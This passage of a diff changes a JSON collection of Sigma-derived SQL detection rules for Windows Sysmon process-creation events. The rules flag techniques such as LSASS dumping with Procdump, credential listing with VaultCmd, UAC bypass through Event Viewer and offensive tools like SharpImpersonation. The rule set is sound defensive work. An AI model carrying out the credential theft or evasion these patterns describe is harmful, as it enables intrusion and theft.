monitored environment" + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\mshta.exe' ESCAPE '\\' AND (CommandLine LIKE '%vbscript%' ESCAPE '\\' OR CommandLine LIKE '%.jpg%' ESCAPE '\\' OR CommandLine LIKE '%.png%' ESCAPE '\\' OR CommandLine LIKE '%.lnk%' ESCAPE '\\' OR CommandLine LIKE '%.xls%' ESCAPE '\\' OR CommandLine LIKE '%.doc%' ESCAPE '\\' OR CommandLine LIKE '%.zip%' ESCAPE '\\' OR CommandLine LIKE '%.dll%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%\\\\SyncAppvPublishingServer.vbs%' ESCAPE '\\' AND CommandLine LIKE '%;%' ESCAPE '\\')" ], - "filename": "proc_creation_win_mshta_susp_execution.yml" + "filename": "proc_creation_win_lolbin_syncappvpublishingserver_vbs_execute_psh.yml" }, { - "title": "Execute Files with Msdeploy.exe", - "id": "646bc99f-6682-4b47-a73a-17b1b64c9d34", + "title": "MMC Spawning Windows Shell", + "id": "05a2ab7e-ce11-4b63-86db-ab32e763e11d", "status": "test", - "description": "Detects file execution using the msdeploy.exe lolbin", - "author": "Beyu Denis, oscd.community", + "description": "Detects a Windows command line executable started from MMC", + "author": "Karneades, Swisscom CSIRT", "tags": [ - "attack.execution", - "attack.t1218" - ], - "falsepositives": [ - "System administrator Usage" + "attack.lateral_movement", + "attack.t1021.003" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%verb:sync%' ESCAPE '\\' AND CommandLine LIKE '%-source:RunCommand%' ESCAPE '\\' AND CommandLine LIKE '%-dest:runCommand%' ESCAPE '\\' AND Image LIKE '%\\\\msdeploy.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ParentImage LIKE 
'%\\\\mmc.exe' ESCAPE '\\' AND ((Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\sh.exe' ESCAPE '\\' OR Image LIKE '%\\\\bash.exe' ESCAPE '\\' OR Image LIKE '%\\\\reg.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\') OR Image LIKE '%\\\\BITSADMIN%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_msdeploy.yml" + "filename": "proc_creation_win_mmc_susp_child_process.yml" }, { - "title": "Active Directory Database Snapshot Via ADExplorer", - "id": "9212f354-7775-4e28-9c9f-8f0a4544e664", + "title": "Windows Credential Manager Access via VaultCmd", + "id": "58f50261-c53b-4c88-bd12-1d71f12eda4c", "status": "experimental", - "description": "Detects the execution of Sysinternals ADExplorer with the \"-snapshot\" flag in order to save a local copy of the active directory database.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "List credentials currently stored in Windows Credential Manager via the native Windows utility vaultcmd.exe", + "author": "frack113", "tags": [ "attack.credential_access", - "attack.t1552.001", - "attack.t1003.003" + "attack.t1555.004" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\ADExplorer.exe' ESCAPE '\\' OR OriginalFileName = 'AdExp') AND CommandLine LIKE '%snapshot%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\VaultCmd.exe' ESCAPE '\\' OR OriginalFileName = 'VAULTCMD.EXE') AND CommandLine LIKE '%/listcreds:%' ESCAPE '\\')" ], - "filename": "proc_creation_win_sysinternals_adexplorer_execution.yml" + "filename": "proc_creation_win_vaultcmd_list_creds.yml" }, { - "title": "PUA- IOX 
Tunneling Tool Execution", - "id": "d7654f02-e04b-4934-9838-65c46f187ebc", - "status": "experimental", - "description": "Detects the use of IOX - a tool for port forwarding and intranet proxy purposes", + "title": "UAC Bypass via Event Viewer", + "id": "be344333-921d-4c4d-8bb8-e584cf584780", + "status": "test", + "description": "Detects UAC bypass method using Windows event viewer", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1090" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002", + "car.2019-04-001" ], "falsepositives": [ - "Legitimate use" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\iox.exe' ESCAPE '\\' OR (CommandLine LIKE '%.exe fwd -l %' ESCAPE '\\' OR CommandLine LIKE '%.exe fwd -r %' ESCAPE '\\' OR CommandLine LIKE '%.exe proxy -l %' ESCAPE '\\' OR CommandLine LIKE '%.exe proxy -r %' ESCAPE '\\') OR (Hashes LIKE '%MD5=9DB2D314DD3F704A02051EF5EA210993%' ESCAPE '\\' OR Hashes LIKE '%SHA1=039130337E28A6623ECF9A0A3DA7D92C5964D8DD%' ESCAPE '\\' OR Hashes LIKE '%SHA256=C6CF82919B809967D9D90EA73772A8AA1C1EB3BC59252D977500F64F1A0D6731%' ESCAPE '\\') OR md5 = '9db2d314dd3f704a02051ef5ea210993' OR sha1 = '039130337e28a6623ecf9a0a3da7d92c5964d8dd' OR sha256 = 'c6cf82919b809967d9d90ea73772a8aa1c1eb3bc59252d977500f64f1a0d6731'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ParentImage LIKE '%\\\\eventvwr.exe' ESCAPE '\\' AND NOT ((Image LIKE '%\\\\mmc.exe' ESCAPE '\\' OR Image LIKE '%:\\\\Windows\\\\SysWOW64\\\\WerFault.exe' ESCAPE '\\' OR Image LIKE '%:\\\\Windows\\\\System32\\\\WerFault.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_pua_iox.yml" + "filename": "proc_creation_win_uac_bypass_eventvwr.yml" }, { - "title": "Suspicious File Characteristics Due to Missing Fields", - "id": 
"9637e8a5-7131-4f7f-bdc7-2b05d8670c43", - "status": "test", - "description": "Detects Executables in the Downloads folder without FileVersion,Description,Product,Company likely created with py2exe", - "author": "Markus Neis, Sander Wiebing", + "title": "Mstsc.EXE Execution With Local RDP File", + "id": "5fdce3ac-e7f9-4ecd-a3aa-a4d78ebbf0af", + "status": "experimental", + "description": "Detects potential RDP connection via Mstsc using a local \".rdp\" file", + "author": "Nasreddine Bencherchali (Nextron Systems), Christopher Peacock @securepeacock", "tags": [ - "attack.execution", - "attack.t1059.006" + "attack.command_and_control", + "attack.t1219" ], "falsepositives": [ - "Unknown" + "Likely with legitimate usage of \".rdp\" files" ], - "level": "medium", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Description LIKE '\\?' ESCAPE '\\' AND FileVersion LIKE '\\?' ESCAPE '\\') OR (Description LIKE '\\?' ESCAPE '\\' AND Product LIKE '\\?' ESCAPE '\\')) OR (Description LIKE '\\?' ESCAPE '\\' AND Company LIKE '\\?' ESCAPE '\\')) AND Image LIKE '%\\\\Downloads\\\\%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\mstsc.exe' ESCAPE '\\' OR OriginalFileName = 'mstsc.exe') AND (CommandLine LIKE '%.rdp' ESCAPE '\\' OR CommandLine LIKE '%.rdp\"' ESCAPE '\\')) AND NOT ((ParentImage LIKE 'C:\\\\Windows\\\\System32\\\\lxss\\\\wslhost.exe' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\ProgramData\\\\Microsoft\\\\WSL\\\\wslg.rdp%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_susp_file_characteristics.yml" + "filename": "proc_creation_win_mstsc_run_local_rdp_file.yml" }, { - "title": "AgentExecutor PowerShell Execution", - "id": "7efd2c8d-8b18-45b7-947d-adfe9ed04f61", - "status": "experimental", - "description": "Detects execution of the AgentExecutor.exe binary. 
Which can be abused as a LOLBIN to execute powershell scripts with the ExecutionPolicy \"Bypass\" or any binary named \"powershell.exe\" located in the path provided by 6th positional argument", - "author": "Nasreddine Bencherchali (Nextron Systems), memory-shards", + "title": "Potential LSASS Process Dump Via Procdump", + "id": "5afee48e-67dd-4e03-a783-f74259dcf998", + "status": "stable", + "description": "Detects suspicious uses of the SysInternals Procdump utility by using a special command line parameter in combination with the lsass.exe process. This way we're also able to catch cases in which the attacker has renamed the procdump executable.", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1218" + "attack.t1036", + "attack.credential_access", + "attack.t1003.001", + "car.2013-05-009" ], "falsepositives": [ - "Legitimate use via Intune management. You exclude script paths and names to reduce FP rate" + "Unlikely, because no one should dump an lsass process memory", + "Another tool that uses the command line switches of Procdump" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '\\\\AgentExecutor.exe' ESCAPE '\\' OR OriginalFileName = 'AgentExecutor.exe') AND (CommandLine LIKE '% -powershell%' ESCAPE '\\' OR CommandLine LIKE '% -remediationScript%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '% -ma %' ESCAPE '\\' OR CommandLine LIKE '% /ma %' ESCAPE '\\') AND CommandLine LIKE '% ls%' ESCAPE '\\')" ], - "filename": "proc_creation_win_lolbin_agentexecutor.yml" + "filename": "proc_creation_win_sysinternals_procdump_lsass.yml" }, { - "title": "UtilityFunctions.ps1 Proxy Dll", - "id": "0403d67d-6227-4ea8-8145-4e72db7da120", + "title": "Use of Remote.exe", + "id": "4eddc365-79b4-43ff-a9d7-99422dc34b93", "status": 
"experimental", - "description": "Detects the use of a Microsoft signed script executing a managed DLL with PowerShell.", - "author": "frack113", + "description": "Remote.exe is part of WinDbg in the Windows SDK and can be used for AWL bypass and running remote files.", + "author": "Christopher Peacock @SecurePeacock, SCYTHE @scythe_io", "tags": [ "attack.defense_evasion", - "attack.t1216" + "attack.t1127" ], "falsepositives": [ - "Unknown" + "Approved installs of Windows SDK with Debugging Tools for Windows (WinDbg)." ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%UtilityFunctions.ps1%' ESCAPE '\\' OR CommandLine LIKE '%RegSnapin %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\remote.exe' ESCAPE '\\' OR OriginalFileName = 'remote.exe'))" ], - "filename": "proc_creation_win_lolbin_utilityfunctions.yml" + "filename": "proc_creation_win_lolbin_remote.yml" }, { - "title": "Run PowerShell Script from ADS", - "id": "45a594aa-1fbd-4972-a809-ff5a99dd81b8", + "title": "Unmount Share Via Net.EXE", + "id": "cb7c4a03-2871-43c0-9bbb-18bbdb079896", "status": "test", - "description": "Detects PowerShell script execution from Alternate Data Stream (ADS)", - "author": "Sergey Soldatov, Kaspersky Lab, oscd.community", + "description": "Detects when when a mounted share is removed. 
Adversaries may remove share connections that are no longer useful in order to clean up traces of their operation", + "author": "oscd.community, @redcanary, Zach Stanford @svch0st", "tags": [ "attack.defense_evasion", - "attack.t1564.004" + "attack.t1070.005" ], "falsepositives": [ - "Unknown" + "Administrators or Power users may remove their shares via cmd line" ], - "level": "high", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (ParentImage LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND (Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND CommandLine LIKE '%Get-Content%' ESCAPE '\\' AND CommandLine LIKE '%-Stream%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\net.exe' ESCAPE '\\' OR Image LIKE '%\\\\net1.exe' ESCAPE '\\') OR OriginalFileName IN ('net.exe', 'net1.exe')) AND (CommandLine LIKE '%share%' ESCAPE '\\' AND CommandLine LIKE '%/delete%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_powershell_run_script_from_ads.yml" + "filename": "proc_creation_win_net_share_unmount.yml" }, { - "title": "Suspicious Use of CSharp Interactive Console", - "id": "a9e416a8-e613-4f8b-88b8-a7d1d1af2f61", - "status": "test", - "description": "Detects the execution of CSharp interactive console by PowerShell", - "author": "Michael R. (@nahamike01)", + "title": "HackTool - TruffleSnout Execution", + "id": "69ca006d-b9a9-47f5-80ff-ecd4d25d481a", + "status": "experimental", + "description": "Detects the use of TruffleSnout.exe an iterative AD discovery toolkit for offensive operators, situational awareness and targeted low noise enumeration.", + "author": "frack113", "tags": [ - "attack.execution", - "attack.t1127" + "attack.discovery", + "attack.t1482" ], "falsepositives": [ - "Possible depending on environment. 
Pair with other factors such as net connections, command-line args, etc." + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\csi.exe' ESCAPE '\\' AND (ParentImage LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\powershell\\_ise.exe' ESCAPE '\\') AND OriginalFileName = 'csi.exe')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (OriginalFileName = 'TruffleSnout.exe' OR Image LIKE '%\\\\TruffleSnout.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_csi_use_of_csharp_console.yml" + "filename": "proc_creation_win_hktl_trufflesnout.yml" }, { - "title": "Whoami Utility Execution", - "id": "e28a5a99-da44-436d-b7a0-2afc20a5f413", - "status": "test", - "description": "Detects the execution of whoami, which is often used by attackers after exploitation / privilege escalation", - "author": "Florian Roth (Nextron Systems)", + "title": "Obfuscated IP Via CLI", + "id": "56d19cb4-6414-4769-9644-1ed35ffbb148", + "status": "experimental", + "description": "Detects usage of an encoded/obfuscated version of an IP address (hex, octal...) 
via commandline", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.discovery", - "attack.t1033", - "car.2016-03-001" + "attack.discovery" ], "falsepositives": [ - "Admin activity", - "Scripts and administrative tools used in the monitored environment", - "Monitoring activity" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\whoami.exe' ESCAPE '\\' OR OriginalFileName = 'whoami.exe'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\ping.exe' ESCAPE '\\' OR Image LIKE '%\\\\arp.exe' ESCAPE '\\') AND (CommandLine LIKE '% 0x%' ESCAPE '\\' OR CommandLine REGEXP ' [0-9]{7,13}'))" ], - "filename": "proc_creation_win_whoami_execution.yml" + "filename": "proc_creation_win_susp_obfuscated_ip_via_cli.yml" }, { - "title": "Hardware Model Reconnaissance Via Wmic.EXE", - "id": "3e3ceccd-6c06-48b8-b5ff-ab1d25db8c1d", + "title": "PsExec Service Child Process Execution as LOCAL SYSTEM", + "id": "7c0dcd3d-acf8-4f71-9570-f448b0034f94", "status": "experimental", - "description": "Detects the execution of WMIC with the \"csproduct\" which is used to obtain information such as hardware models and vendor information", + "description": "Detects suspicious launch of the PSEXESVC service on this system and a sub process run as LOCAL_SYSTEM (-s), which means that someone remotely started a command on this system running it with highest privileges and not only the privileges of the login user account (e.g. 
the administrator account)", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1047", - "car.2016-03-002" + "attack.execution" ], "falsepositives": [ - "Unknown" + "Users that debug Microsoft Intune issues using the commands mentioned in the official documentation; see https://learn.microsoft.com/en-us/mem/intune/apps/intune-management-extension" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\wmic.exe' ESCAPE '\\' OR OriginalFileName = 'wmic.exe') AND CommandLine LIKE '%csproduct%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE 'C:\\\\Windows\\\\PSEXESVC.exe' ESCAPE '\\' AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_wmic_recon_csproduct.yml" + "filename": "proc_creation_win_sysinternals_psexesvc_as_system.yml" }, { - "title": "PUA - Advanced IP Scanner Execution", - "id": "bef37fa2-f205-4a7b-b484-0759bfd5f86f", + "title": "HackTool - SharpLdapWhoami Execution", + "id": "d9367cbb-c2e0-47ce-bdc0-128cb6da898d", "status": "experimental", - "description": "Detects the use of Advanced IP Scanner. 
Seems to be a popular tool for ransomware groups.", - "author": "Nasreddine Bencherchali (Nextron Systems), @ROxPinTeddy", + "description": "Detects SharpLdapWhoami, a whoami alternative that queries the LDAP service on a domain controller", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.discovery", - "attack.t1046", - "attack.t1135" + "attack.t1033", + "car.2016-03-001" ], "falsepositives": [ - "Legitimate administrative use" + "Programs that use the same command line flags" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\advanced\\_ip\\_scanner%' ESCAPE '\\' OR OriginalFileName LIKE '%advanced\\_ip\\_scanner%' ESCAPE '\\' OR Description LIKE '%Advanced IP Scanner%' ESCAPE '\\') OR (CommandLine LIKE '%/portable%' ESCAPE '\\' AND CommandLine LIKE '%/lng%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\SharpLdapWhoami.exe' ESCAPE '\\' OR OriginalFileName LIKE '%SharpLdapWhoami%' ESCAPE '\\' OR Product = 'SharpLdapWhoami' OR (CommandLine LIKE '% /method:ntlm' ESCAPE '\\' OR CommandLine LIKE '% /method:kerb' ESCAPE '\\' OR CommandLine LIKE '% /method:nego' ESCAPE '\\' OR CommandLine LIKE '% /m:nego' ESCAPE '\\' OR CommandLine LIKE '% /m:ntlm' ESCAPE '\\' OR CommandLine LIKE '% /m:kerb' ESCAPE '\\')))" ], - "filename": "proc_creation_win_pua_advanced_ip_scanner.yml" + "filename": "proc_creation_win_hktl_sharpldapwhoami.yml" }, { - "title": "Remote PowerShell Session Host Process (WinRM)", - "id": "734f8d9b-42b8-41b2-bcf5-abaf49d5a3c8", - "status": "test", - "description": "Detects remote PowerShell sections by monitoring for wsmprovhost (WinRM host process) as a parent or child process (sign of an active PowerShell remote session).", - "author": "Roberto Rodriguez @Cyb3rWard0g", + "title": "Lolbin Unregmp2.exe Use As Proxy", + "id": 
"727454c0-d851-48b0-8b89-385611ab0704", + "status": "experimental", + "description": "Detect usage of the \"unregmp2.exe\" binary as a proxy to launch a custom version of \"wmpnscfg.exe\"", + "author": "frack113", "tags": [ - "attack.execution", - "attack.t1059.001", - "attack.t1021.006" + "attack.defense_evasion", + "attack.t1218" ], "falsepositives": [ - "Legitimate usage of remote Powershell, e.g. for monitoring purposes." + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\wsmprovhost.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\wsmprovhost.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\unregmp2.exe' ESCAPE '\\' OR OriginalFileName = 'unregmp2.exe') AND CommandLine LIKE '% /HideWMP%' ESCAPE '\\')" ], - "filename": "proc_creation_win_winrm_remote_powershell_session_process.yml" + "filename": "proc_creation_win_lolbin_unregmp2.yml" }, { - "title": "PUA - AdvancedRun Execution", - "id": "d2b749ee-4225-417e-b20e-a8d2193cbb84", + "title": "HackTool - SharpImpersonation Execution", + "id": "f89b08d0-77ad-4728-817b-9b16c5a69c7a", "status": "experimental", - "description": "Detects the execution of AdvancedRun utility", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects execution of the SharpImpersonation tool. 
Which can be used to manipulate tokens on a Windows computers remotely (PsExec/WmiExec) or interactively", + "author": "Sai Prashanth Pulisetti @pulisettis, Nasreddine Bencherchali (Nextron Systems)", + "tags": [ + "attack.privilege_escalation", + "attack.defense_evasion", + "attack.t1134.001", + "attack.t1134.003" + ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (OriginalFileName = 'AdvancedRun.exe' OR (CommandLine LIKE '% /EXEFilename %' ESCAPE '\\' AND CommandLine LIKE '% /Run%' ESCAPE '\\') OR (CommandLine LIKE '% /WindowState 0%' ESCAPE '\\' AND CommandLine LIKE '% /RunAs %' ESCAPE '\\' AND CommandLine LIKE '% /CommandLine %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\SharpImpersonation.exe' ESCAPE '\\' OR OriginalFileName = 'SharpImpersonation.exe' OR (CommandLine LIKE '% user:%' ESCAPE '\\' AND CommandLine LIKE '% binary:%' ESCAPE '\\') OR (CommandLine LIKE '% user:%' ESCAPE '\\' AND CommandLine LIKE '% shellcode:%' ESCAPE '\\') OR (CommandLine LIKE '% technique:CreateProcessAsUserW%' ESCAPE '\\' OR CommandLine LIKE '% technique:ImpersonateLoggedOnuser%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_pua_advancedrun.yml" + "filename": "proc_creation_win_hktl_sharp_impersonation.yml" }, { - "title": "Ps.exe Renamed SysInternals Tool", - "id": "18da1007-3f26-470f-875d-f77faf1cab31", - "status": "test", - "description": "Detects renamed SysInternals tool execution with a binary named ps.exe as used by Dragonfly APT group and documented in TA17-293A report", - "author": "Florian Roth (Nextron Systems)", + "title": "Change Default File Association To Executable Via Assoc", + "id": "ae6f14e6-14de-45b0-9f44-c0986f50dc89", + "status": "experimental", + "description": "Detects when a program changes the default file association of 
any extension to an executable.\nWhen a file is opened, the default program used to open the file (also called the file association or handler) is checked. File association selections are stored in the Windows Registry and can be edited by users, administrators, or programs that have Registry access or by administrators using the built-in assoc utility. Applications can modify the file association for a given file extension to call an arbitrary program when a file with the given extension is opened.\n", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.g0035", - "attack.t1036.003", - "car.2013-05-009" + "attack.persistence", + "attack.t1546.001" ], "falsepositives": [ - "Renamed SysInternals tool" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine = 'ps.exe -accepteula')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR OriginalFileName = 'Cmd.Exe') AND (CommandLine LIKE '%assoc %' ESCAPE '\\' AND CommandLine LIKE '%exefile%' ESCAPE '\\')) AND NOT (CommandLine LIKE '%.exe=exefile%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_apt_ta17_293a_ps.yml" + "filename": "proc_creation_win_cmd_assoc_tamper_exe_file_association.yml" }, { - "title": "Use of UltraViewer Remote Access Software", - "id": "88656cec-6c3b-487c-82c0-f73ebb805503", - "status": "experimental", - "description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\nThese services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently 
when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)\n", - "author": "frack113", + "title": "Suspicious Process Start Locations", + "id": "15b75071-74cc-47e0-b4c6-b43744a62a2b", + "status": "test", + "description": "Detects suspicious process run from unusual locations", + "author": "juju4, Jonhnathan Ribeiro, oscd.community", "tags": [ - "attack.command_and_control", - "attack.t1219" + "attack.defense_evasion", + "attack.t1036", + "car.2013-05-002" ], "falsepositives": [ - "Legitimate use" + "False positives depend on scripts and administrative tools used in the monitored environment" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Product = 'UltraViewer' OR Company = 'DucFabulous Co,ltd' OR OriginalFileName LIKE 'UltraViewer\\_Desktop.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%:\\\\RECYCLER\\\\%' ESCAPE '\\' OR Image LIKE '%:\\\\SystemVolumeInformation\\\\%' ESCAPE '\\') OR (Image LIKE 'C:\\\\Windows\\\\Tasks\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\debug\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\fonts\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\help\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\drivers\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\addins\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\cursors\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\system32\\\\tasks\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_remote_access_software_ultraviewer.yml" + "filename": "proc_creation_win_rundll32_run_locations.yml" }, { - "title": "Dropping Of Password Filter DLL", - "id": "b7966f4a-b333-455b-8370-8ca53c229762", + "title": "HTML Help HH.EXE Suspicious Child Process", + "id": "52cad028-0ff0-4854-8f67-d25dfcbc78b4", "status": "test", - "description": "Detects dropping of dll 
files in system32 that may be used to retrieve user credentials from LSASS", - "author": "Sreeman", + "description": "Detects a suspicious child process of a Microsoft HTML Help (HH.exe)", + "author": "Maxim Pavlunin, Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1556.002" + "attack.defense_evasion", + "attack.execution", + "attack.initial_access", + "attack.t1047", + "attack.t1059.001", + "attack.t1059.003", + "attack.t1059.005", + "attack.t1059.007", + "attack.t1218", + "attack.t1218.001", + "attack.t1218.010", + "attack.t1218.011", + "attack.t1566", + "attack.t1566.001" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%HKLM\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\Lsa%' ESCAPE '\\' AND CommandLine LIKE '%scecli\\\\0%' ESCAPE '\\' AND CommandLine LIKE '%reg add%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\hh.exe' ESCAPE '\\' AND (Image LIKE '%\\\\CertReq.exe' ESCAPE '\\' OR Image LIKE '%\\\\CertUtil.exe' ESCAPE '\\' OR Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\installutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\MSbuild.exe' ESCAPE '\\' OR Image LIKE '%\\\\MSHTA.EXE' ESCAPE '\\' OR Image LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR Image LIKE '%\\\\wmic.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_reg_credential_access_via_password_filter.yml" + "filename": "proc_creation_win_hh_html_help_susp_child_process.yml" }, { - "title": "Malicious 
